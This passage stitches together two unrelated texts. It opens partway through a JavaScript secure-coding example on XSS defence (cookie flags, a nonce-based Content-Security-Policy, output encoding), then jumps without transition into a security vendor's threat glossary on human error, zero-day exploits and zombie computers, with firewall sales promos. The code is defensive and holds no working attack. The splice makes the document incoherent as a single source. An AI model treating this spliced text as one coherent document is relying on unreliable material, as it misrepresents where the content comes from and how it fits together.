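// cross-site sends. The value is URL-encoded so it cannot smuggle ";" into the header.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// A CSP that only runs scripts from this origin or carrying the per-response nonce,
// so an injected <script> without the nonce does not execute even if encoding is missed.
// The nonce must be random and fresh per response (e.g. 16 bytes from crypto.randomBytes).
function cspHeader(nonce) {
  return `default-src 'self'; script-src 'self' 'nonce-${nonce}'; object-src 'none'; base-uri 'none'`;
}

console.log("vulnerable:", renderSearchVulnerable(PAYLOAD));
console.log("hardened:  ", renderSearchSafe(PAYLOAD));
console.log("Set-Cookie:", sessionCookieHeader("s3ss10n-constructed"));
console.log("Content-Security-Policy:", cspHeader("r4nd0mN0nc3"));
```

The encoding belongs at the point of output, not at input: the same query string may later be written into a JSON response or a URL, each of which needs a different encoder, and encoding on input would either break those uses or leave the HTML context unprotected.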
Why are You on this list?
You (and your users) are among the greatest cyber threats as it is human behavior that tends to lead to most breaches. A user visiting suspicious websites, downloading questionable software, using a compromised WiFi network, sharing proprietary information, skipping important software updates, or opening a suspicious email attachment opens the door to malware and data loss. You could say people are the greatest vulnerability and therefore the greatest threat to your network security.
How to Recognize This Threat: Look in the mirror and at the number of users across your organization. And don’t forget that hackers are people as well, looking to exploit others’ weaknesses for personal gain.
How to Prevent This Threat: Train yourself and your users in safe email and web browsing techniques, with regular alerts about the latest types of threats. Enable auto-updates or set reminders to keep up with the latest security patches. But the human element will always be present, and hackers are crafty, so you'll need another layer of defense. Firewalls complete with security services subscriptions can keep vulnerabilities from affecting your organization. Visit our Promos page for the latest deals on firewall bundles.
What is a Zero-Day Exploit?
Zero-day exploits target software or application vulnerabilities that the vendor is not yet aware of or has not yet fixed, which means no patch is available at the time the exploit is used. Often only the hacker (and whoever they have sold or shared the exploit with) knows the vulnerability exists. The name refers to the vendor having had "zero days" to fix the flaw before it was exploited; once the vendor becomes aware of it, the clock starts on developing a patch.
How to Recognize This Threat: Because there is no signature for an exploit nobody has seen before, recognition relies on behavior rather than on matching known malware. Endpoint tools that establish baselines for normal system behavior can flag deviations from them, machine learning models trained on the characteristics of known malware can catch new samples that resemble it, and analysis of how software interacts with the system (for example, a document viewer spawning a command shell) can expose activity that is the result of exploitation.
How to Prevent This Threat: A zero-day by definition has no patch, but keeping your computers (including OS and all applications) fully patched closes the known vulnerabilities that exploit chains usually combine with it, and shortens the window in which a zero-day stays useful once the fix ships. Pair patching with active antivirus or endpoint security that includes behavioral and exploit protection. See the options from Sophos and SonicWall to secure your endpoint.
What is a Zombie?
A zombie is a computer or device infected with malware that is controlled remotely by a hacker. Zombies may be used to launch online attacks or send spam or phishing emails to infect other devices. A large group of these zombies is known as a botnet.
How to Recognize This Threat: Slow performance is the most commonly cited sign of a zombie computer, but it is an unreliable one. Better signals are unexplained outbound network traffic, a computer that is busy when no one is using it (the hacker controlling it can task it at any time), mail delivery failures or blocklisting of your public IP address caused by spam sent from it, and firewall alerts about connections to known command-and-control addresses.
How to Prevent This Threat: Avoid downloading files you’re unsure of, and keep your network protected from online threats with a firewall that’s outfitted with email and web security. Find the firewall that’s right for you.